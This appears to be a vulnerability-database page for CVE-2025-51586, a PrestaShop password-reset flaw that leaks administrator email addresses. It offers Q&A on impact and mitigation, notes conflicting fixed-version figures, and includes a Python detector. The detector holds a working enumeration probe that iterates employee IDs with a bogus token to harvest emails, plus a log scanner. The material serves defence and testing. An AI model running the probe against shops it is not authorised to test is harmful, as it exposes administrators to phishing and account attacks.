CVE-2025-51586
BaseFortify

Publication date: 2025-09-08

Last updated on: 2025-09-12

Assigner: MITRE

Description
An issue was discovered in file controllers/admin/AdminLoginController.php in PrestaShop before 8.2.1 allowing attackers to gain sensitive information via the reset password feature.
Meta Information
Published: 2025-09-08
Last Modified: 2025-09-12
Generated: 2026-05-07
AI Q&A: 2025-09-08
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (1 associated CPE)
Vendor: prestashop
Product: prestashop
Version / Range: up to 8.2.1 (excluding)
CWE
CWE ID Description
CWE-359 The product does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2025-51586 is a user enumeration vulnerability in PrestaShop's AdminLogin controller (controllers/admin/AdminLoginController.php). Attackers can manipulate the `id_employee` and `reset_token` parameters of the Back Office password reset form to obtain administrator email addresses. When an invalid reset token is supplied together with a valid employee ID, the system still renders the password reset form and includes that employee's email address in a hidden field, so an attacker can enumerate admin emails by iterating employee IDs. The root cause is that the reset form variables are assigned without first verifying that the reset token is valid for that employee. [1] Note that the affected range is stated inconsistently on this page: the CVE description and the CPE entry above say PrestaShop before 8.2.1, while the cited advisory gives versions 1.7 through 8.2.2 with a fix in 8.2.3; confirm against the vendor advisory before deciding whether a deployment is in scope.


How can this vulnerability impact me?

This vulnerability can allow remote attackers to gain sensitive information, specifically administrator email addresses, without any privileges or user interaction. Knowing these email addresses can facilitate targeted attacks such as phishing or brute force attempts against administrator accounts. Although the vulnerability does not directly allow account takeover, it exposes private information that can be leveraged in further attacks. The attack has high complexity and cannot be reliably blocked by common WAF rules. [1]


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability exposes sensitive personal information (administrator email addresses) without proper authorization, which could be considered a violation of data protection principles under regulations like GDPR and HIPAA. Unauthorized disclosure of personal data may lead to non-compliance with these standards, potentially resulting in legal and regulatory consequences. Therefore, this vulnerability negatively impacts compliance with common data protection regulations. [1]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

There are two complementary approaches. Active testing: send requests to the Back Office reset password endpoint with a valid `id_employee` and an invalid `reset_token`; on an unpatched instance the response still contains the reset form with the administrator's email address in a hidden field, so iterating `id_employee` values with curl or Burp Suite and inspecting each response for an email address confirms exposure (only against systems you are authorised to test). Passive detection: monitor web server access logs for requests to the Back Office password reset URL from a single client that cycle through many different `id_employee` values, especially when they succeed with HTTP 200; a legitimate reset touches one employee ID. The source provides no specific commands. [1]
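The two checks described above, as an added example written for this page (not code from BaseFortify or from the PrestaShop project): an active probe that requests the reset form with a deliberately bogus `reset_token` and reports any email address that comes back in a hidden `<input>`, and a passive scan of combined-format access logs that flags a client cycling through `id_employee` values. The reset URL shape (`index.php?controller=AdminLogin&reset=1&id_employee=N&reset_token=T`), the hidden field name `reset_email`, the log format, and every host, address and response body below are assumptions or constructed samples, not taken from the page or the advisory.

```python
import re
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


class _HiddenInputs(HTMLParser):
    """Collect name -> value of every <input type="hidden"> in a page."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k.lower(): v for k, v in attrs}
        if (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.hidden[a["name"]] = a.get("value") or ""


def leaked_emails(html):
    """{field_name: value} for hidden inputs whose value is an email address.
    A patched shop rejects the bogus token before rendering the form, so a
    clean response yields an empty dict."""
    parser = _HiddenInputs()
    parser.feed(html)
    return {n: v for n, v in parser.hidden.items() if EMAIL_RE.match(v)}


def probe(fetch, admin_index_url, id_range, bogus_token="0" * 40):
    """Active check: request each id_employee with an invalid reset_token.
    `fetch` is any callable url -> body (urllib, requests, or fake_fetch below),
    so the caller controls pacing and authorisation. Returns {id: [emails]}."""
    found = {}
    for emp_id in id_range:  # URL shape is an assumption, see lead-in
        url = (f"{admin_index_url}?controller=AdminLogin&reset=1"
               f"&id_employee={emp_id}&reset_token={bogus_token}")
        emails = sorted(set(leaked_emails(fetch(url)).values()))
        if emails:
            found[emp_id] = emails
    return found


# Apache/nginx "combined" format: client ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def reset_enumeration_suspects(log_lines, threshold=5):
    """Passive check: client IPs that hit the AdminLogin reset form for at least
    `threshold` distinct id_employee values (a real reset touches one ID)."""
    ids_by_ip = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlparse(m.group("path")).query)
        if qs.get("controller", [""])[0] != "AdminLogin" or "reset" not in qs:
            continue
        for emp_id in qs.get("id_employee", []):
            ids_by_ip[m.group("ip")].add(emp_id)
    return {ip: len(ids) for ip, ids in ids_by_ip.items() if len(ids) >= threshold}


# ---- constructed sample data (not captured from any real shop) ----
VULNERABLE_FORM = """<html><body><form action="index.php?controller=AdminLogin" method="post">
<input type="hidden" name="id_employee" value="1">
<input type="hidden" name="reset_token" value="0000000000000000000000000000000000000000">
<input type="hidden" name="reset_email" value="admin@shop.example.invalid">
<input type="password" name="passwd"><input type="password" name="passwd_confirm">
</form></body></html>"""
FIXED_RESPONSE = """<html><body><div class="alert">Invalid token or employee.</div>
<form method="post"><input type="hidden" name="redirect" value="index.php"></form></body></html>"""


def fake_fetch(url):
    """Stand-in HTTP client: IDs 1 and 2 behave like an unpatched shop, every
    other ID like a patched one (or a non-existent employee)."""
    emp_id = parse_qs(urlparse(url).query).get("id_employee", [""])[0]
    if emp_id == "1":
        return VULNERABLE_FORM
    if emp_id == "2":
        return VULNERABLE_FORM.replace("admin@shop.example.invalid", "ops@shop.example.invalid")
    return FIXED_RESPONSE


SAMPLE_LOG = [
    '203.0.113.5 - - [08/Sep/2025:10:00:01 +0000] "GET /admin123/index.php?controller=AdminLogin&reset=1&id_employee=1&reset_token=deadbeef HTTP/1.1" 200 5123 "-" "curl/8.5.0"',
    '203.0.113.5 - - [08/Sep/2025:10:00:02 +0000] "GET /admin123/index.php?controller=AdminLogin&reset=1&id_employee=2&reset_token=deadbeef HTTP/1.1" 200 5130 "-" "curl/8.5.0"',
    '203.0.113.5 - - [08/Sep/2025:10:00:03 +0000] "GET /admin123/index.php?controller=AdminLogin&reset=1&id_employee=3&reset_token=deadbeef HTTP/1.1" 200 4811 "-" "curl/8.5.0"',
    '203.0.113.5 - - [08/Sep/2025:10:00:04 +0000] "GET /admin123/index.php?controller=AdminLogin&reset=1&id_employee=4&reset_token=deadbeef HTTP/1.1" 200 4811 "-" "curl/8.5.0"',
    '198.51.100.7 - - [08/Sep/2025:10:05:00 +0000] "GET /admin123/index.php?controller=AdminLogin&reset=1&id_employee=1&reset_token=3f9c1a HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Sep/2025:10:06:00 +0000] "GET /admin123/index.php?controller=AdminDashboard HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(probe(fake_fetch, "https://shop.example.invalid/admin123/index.php", range(1, 6)))
    print(reset_enumeration_suspects(SAMPLE_LOG, threshold=3))
```

To run the probe against your own shop, pass a real fetcher (for example a small wrapper around `urllib.request.urlopen` that returns the decoded body) and pace the calls; a non-empty result means the instance still renders the form for a bad token and is unpatched. The passive check needs no traffic at all and is the safer first step when you cannot test the instance directly; an IP it returns is walking the employee ID space, which no legitimate password reset does.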


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include: 1) Enforce rate limiting on the password reset endpoint to reduce the feasibility of enumeration attacks. 2) Enable two-factor authentication (2FA) for Back Office login to add an additional security layer. 3) Keep the Back Office URL secret and rotate it if it has been leaked. 4) Update PrestaShop to a fixed release, where the reset token is verified before the reset form and email field are rendered; the cited advisory names 8.2.3 or later, while the CVE description and CPE entry above indicate the fix landed in 8.2.1, so check the vendor advisory for your branch. Because the flaw is application logic, common WAF rules are not reliable against it and rate limiting is a stopgap, not a fix. [1]

